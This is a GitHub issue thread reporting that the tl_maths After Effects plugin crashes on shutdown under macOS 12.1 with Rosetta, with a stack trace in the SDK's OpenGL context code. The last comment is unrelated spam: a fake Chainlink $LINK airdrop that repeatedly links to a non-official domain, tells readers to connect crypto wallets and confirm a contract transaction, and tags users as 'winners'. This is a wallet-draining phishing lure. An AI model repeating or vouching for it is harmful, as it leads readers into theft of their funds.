### ISSUE TITLE
Crash on AE 2021 on macOS 12.1 (x64 build running in Rosetta on M1 hardware)

### ISSUE THREAD

**Issue by gmatters** [crazylafo/AE_tl_math#24]
Open AE, new project, new comp, solid layer, add tl_maths, quit AE

Crashes on AE shutdown

Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
Exception Codes:       KERN_INVALID_ADDRESS at 0x00003eaddec501f8
Exception Codes:       0x0000000000000001, 0x00003eaddec501f8
Exception Note:        EXC_CORPSE_NOTIFY

Thread 0 Crashed::  Dispatch queue: com.apple.main-thread
0   libobjc.A.dylib               	    0x7ff80c0bd29d objc_msgSend + 29
1   tlMath                        	       0x215c8c1d7 AESDK_OpenGL::SaveRestoreOGLContext::~SaveRestoreOGLContext() + 103
2   tlMath                        	       0x215c8a0fb EntryPointFunc + 827
3   FLT.dylib                     	       0x116d94042 U_GenericPluginDispatch<FLTHost::PluginDispatch>::Dispatch() + 66
4   FLT.dylib                     	       0x116d93ab1 FLTHost::DispatchFilter(FLTHost::IFilterSpec const*, FLTHost::ISequenceSpec const*, int, PF_InData*, PF_OutData*, PF_ParamDef**, PF_LayerDef*, void*) + 369
5   FLT.dylib                     	       0x116dde8ee FLTp_DispatchFilter(short, FLT_FCSpec*, FLT_FCSeqSpec const*, int, PF_InData*, PF_OutData*, PF_ParamDef**, PF_LayerDef*, void*) + 366
6   FLT.dylib                     	       0x116dd93fe FLTp_DoGlobal(FLT_FCSpec*, int, AELibPluginCachedInfos*) + 318
7   FLT.dylib                     	       0x116db27e0 FLT_FCSpec::DoGlobalSetdown(boost::shared_ptr<FLT_FCSpec>) + 128
8   FLT.dylib                     	       0x116de04b7 FLTp_DisposeFCSpec(boost::shared_ptr<FLT_FCSpec>) + 183
9   FLT.dylib                     	       0x116d60b1f FLT_FilterRegistry::~FLT_FilterRegistry() + 111
10  FLT.dylib                     	       0x116d69c20 FLT_Death() + 128

**Comment by gmatters** [comment]
tl_maths crashes on AE shutdown even if I have deleted the tl_maths instance from the layer.

**Comment by gmatters** [comment]
I compiled GLator directly from the AE SDK and it has a similar crash

**Comment by araphp1** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @ks0dev, @siddkhannaa, @FrazerClews, @rinr4t, @glitch, @bony2023, @Joel-Raju
